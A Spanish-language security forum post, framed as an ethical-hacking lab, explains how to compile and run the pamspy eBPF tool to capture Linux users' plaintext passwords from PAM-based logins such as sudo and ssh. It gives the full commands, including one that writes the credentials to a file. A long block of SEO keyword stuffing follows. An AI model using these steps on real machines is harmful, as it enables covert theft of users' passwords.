COMO EXTRAER CONTRASEÑAS en LINUX | Hacking Seguridad Informática

Avatar de Usuario
admin
Verified
Site Admin
Mensajes: 2085
Registered for: 9 years 9 months
9
Ubicación: Ciudad de Córdoba - Argentina
Gender:
Edad: 41
Contactar:

COMO EXTRAER CONTRASEÑAS en LINUX | Hacking Seguridad Informática

#1

Mensaje por admin »

Vamos a realizar un ejercicio de pentesting donde vamos a ver como un BUG en PAM (Pluggable Authentication Modules), que es una librería, nos permite ver y extraer contraseñas (passwords) y nombres de usuario, de usuarios que usan funciones como sudo, sshd, passwd, gnome, x11 entre otros. Esto ha sido probado en varias distrubciones en como Ubuntu, Debian, CentOS, Kali Linux, Fedora, Arch y Red Hat. Se ha notado que las ultimas versiones de estos mencionados han solucionado el inconveniente.

Imagen
 
LINKS IMPORTANTES

https://web.mit.edu/rhel-doc/4/RH-DOCS/ ... h-pam.html
https://hakin9.org/pamspy-credentials-d ... sing-ebpf/
https://github.com/citronneur/pamspy

COMANDOS EJECUTADOS

Código: Seleccionar todo

Basicamente para ejeuctar esto necesitamos dependencias, paquetes u otras liberias. Basicamente
nos van a permitir realizar tareas de compilacion de este binario
 
sudo apt install make clang-11 gcc libelf-dev bpftool


Clonamos el repositorio

git clone https://github.com/citronneur/pamspy --recursive
cd pamspy/src
make

Y adentro de esta carpeta esta el ejecutable o binario por decirlo de alguna forma
que nos va a permitir ejecutar esto

cd bin
para ver el binario tiramos un ls


As pamspy rely on libpam, we have to set the path where libpam is installed on your distribution. 
To find where libpam is installed you can run the following command :

> /usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4
/lib/x86_64-linux-gnu/libpam.so.0

Once you get the path you can launch pamspy :

> ./pamspy -p /lib/x86_64-linux-gnu/libpam.so.0


Para guardarlo en un texto claro
./pamspy -p $(/usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4) -d /tmp/credentials
LABORATORIO

Imagen
 
VIDEO TUTORIAL



Hacking ético Seguridad informática Pentesting Linux PAM (Pluggable Authentication Modules) Contraseñas Usuarios Sudo SSH Gnome X11 Vulnerabilidades Exploits Ciberseguridad Seguridad en la red Protección de datos Prevención de intrusiones Seguridad de la información Ciberataques Hacking de contraseñas Ciberseguridad empresarial Amenazas informáticas Protección de la información Herramientas de hacking Ciberdefensa Seguridad de red Ingeniería inversa Análisis de vulnerabilidades Auditoría de seguridad Seguridad en servidores Amenazas de seguridad Análisis de malware Sistemas operativos seguros Protección de la privacidad Técnicas de hacking Política de seguridad informática Hacking de sistemas Ingeniería social Hacking de aplicaciones web Hacking de redes inalámbricas Hacking de bases de datos Prevención de brechas de seguridad Protección contra ataques informáticos Informática forense Protección de datos sensibles linux for ethical hackers como usar kali linux, explotar vulnerabilidades con metasploit acceder a linux con metasploit acceder a windows acceder graficamente a windows desde kali linux acceder remotamente a Linux information systems security professional metasploit ataque a windows proteger computadoras penetration tests oscp certification Security Technologies Sistema operativo Operating Systems Instalación y configuración Install and configure ssh Unauthenticated LAN Remote Code Execution Reverse connection Shell backdoor LAN | Local Area Network CMD execution How to Exploit and Test this Critical Vulnerability ransomware attackers repository Netcat Listener Exploit Code NC Virtual machine maquina virtua NetCat GitHub Firewall Pentest Lab Setup Laboratorio de Trabajo Security Ethical Hacking Certification Guide how to get in Terminal Hashcat python blue team Dynamic Shellcode Injection Linux Red Team mfsconsole vulnerabilidades de seguridad detección de intrusos Networking Hash scripts cifrado descrifrar Obfuscation Encoding Mitre Packing Crypters AV Evasion Methods Penetration Testing Malware Analysis Penetration Tester Cybersecurity Consultant learn security unix try hack me hacking ctf for beginners Linux Ubuntu ehtical hacking cyber seguridad linux for ethical hackers capacitacion educacion How Hackers Do It cyber security remote function Injecting Shellcode into Portable Executables cyber seguridad security capacitacion educacion How Hackers Do It cyber security tutorial comandos commands remote function laboratorio testing servidor como escalar privilegios en windows o linux kernel vulnerable CVE remote function hacker exploit hacking what is a red team red team exploitation red team initial access Penetration Tester learn security unix try hack me ctf for beginners ehtical hacking pamspy,Penetration Tester,Cybersecurity Consultant,learn security,unix,OSINT,oscp certification,try hack me,hacking,ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,remote function,laboratorio,lab,dump,servidor,como escalar privilegios en linux,kernel vulnerable,CVE,contraseñas,passwords,Credentials Dumper for Linux

Enlace:
BBCode:
HTML:
Ocultar enlaces al mensaje
Mostrar enlaces al mensaje
Responder

Create an account or sign in to join the discussion

You need to be a member in order to post a reply

Create an account

Not a member? register to join our community
Members can start their own topics & subscribe to topics
It’s free and only takes a minute

Registrarse

Sign in

  • Temas similares
    Respuestas
    Vistas
    Último mensaje

Volver a “Redes/Networking”

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 0 invitados